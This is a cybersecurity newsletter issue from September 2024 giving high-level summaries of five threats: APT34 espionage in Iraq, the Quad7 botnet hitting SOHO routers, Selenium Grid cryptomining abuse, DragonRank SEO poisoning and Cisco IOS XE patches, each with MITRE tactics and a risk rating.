Today’s Cybersecurity Threats and Trends - 09/12/2024

A Black (Hat) Dragon hits it big with Quad7's.

Author

J.W. Croley
September 12, 2024

Before we dive in, I would like to thank all of you for supporting us with your subscription! My goal is to bring both actionable insights and information regarding cybersecurity threats to the non-tech and technical professional alike. If this sounds like something that would help someone you know, please share the newsletter!

Please check out our partners and sponsors! It goes a long way in our quest to get everyone involved in cybersecurity.

1. OilRig’s Iraqi Infiltration

Primary Threat: APT34, also known as OilRig, has been identified targeting the Iraqi government in a series of cyber-espionage attacks. The group is leveraging new malware tools to infiltrate government systems, exfiltrate sensitive data, and maintain long-term persistence. This campaign is part of a larger effort by the group to expand its operations in the Middle East, according to Checkpoint research.

  • MITRE Tactics: Initial Access, Persistence, Exfiltration

  • Risk: High – Targeted government attacks with long-term espionage goals represent a significant national security threat.

2. Botnet Behemoth: Quad7’s SOHO Surge

Primary Threat: The Quad7 botnet, previously known for attacking large-scale infrastructures, has shifted its focus to small office/home office (SOHO) routers. By exploiting unpatched routers, the botnet can launch distributed denial-of-service (DDoS) attacks and further spread malware. Sekoia TDR research has revealed that the operators behind Quad7 are increasing their efforts to build a botnet army of compromised routers, which may affect both small businesses and remote workers.

  • MITRE Tactics: Command and Control, Impact

  • Risk: High – Unsecured SOHO routers can be exploited to launch larger-scale attacks, making this a growing concern for small businesses.

Unlock your potential with our partner…

Whether you're a beginner or an expert, Hack The Box provides a dynamic and engaging environment to test your hacking mettle. Join me and thousands of other professionals in this thriving community and take your cybersecurity expertise to the next level.

Start your journey today!

3. Selenium Servers Suffer Sabotage

Primary Threat: Hackers are now misusing Selenium Grid servers—commonly used for automating web applications testing—for cryptomining and proxyjacking activities. According to CADO Security research, attackers are leveraging misconfigured Selenium servers to mine cryptocurrency or sell off compromised server resources. This trend has grown significantly due to the ease of exploiting these automation tools.

  • MITRE Tactics: Execution, Impact

  • Risk: Medium – While not affecting critical infrastructure, these attacks can significantly affect cloud costs and performance for companies reliant on Selenium.

4. DragonRank Raises Rogue Results

Primary Threat: The DragonRank campaign is using black hat SEO techniques to poison search engine results, redirecting users to malicious websites. Cisco Talos research indicates that attackers are targeting popular search terms to manipulate rankings and push malicious links. Unsuspecting users who click on these results may end up infected with malware or tricked into handing over sensitive information.

  • MITRE Tactics: Initial Access, Exfiltration

  • Risk: Medium – This SEO poisoning campaign can affect both individuals and businesses, leading to compromised systems and data theft.

5. Cisco Closes Critical Security Gap

Primary Threat: Cisco has released patches for several high-severity vulnerabilities affecting its IOS XE software, with the most critical being a remote code execution flaw (CVE-2024-20398). This vulnerability allows unauthenticated attackers to execute arbitrary commands on vulnerable systems, potentially leading to full system compromise. Cisco strongly advises administrators to apply the necessary patches immediately to mitigate this risk.

  • MITRE Tactics: Execution, Privilege Escalation

  • Risk: Critical – This vulnerability can lead to full system control, making it imperative for network operators to patch immediately.

IN SUMMARY:

Today’s cybersecurity news showcases a variety of attacks and vulnerabilities, from Iran’s APT34 targeting Iraqi government agencies to the Quad7 botnet compromising small office routers.

With malicious actors abusing everything from Selenium Grid servers to search engines, it’s crucial to stay vigilant.

Also, make sure to patch your Cisco systems and remain cautious when browsing online.

And now, it’s that time… All together kids!
“Its better to be paranoid than to be pwnd!”

J.W.

(P.S. Check out our partners! It goes a long way to support this newsletter!)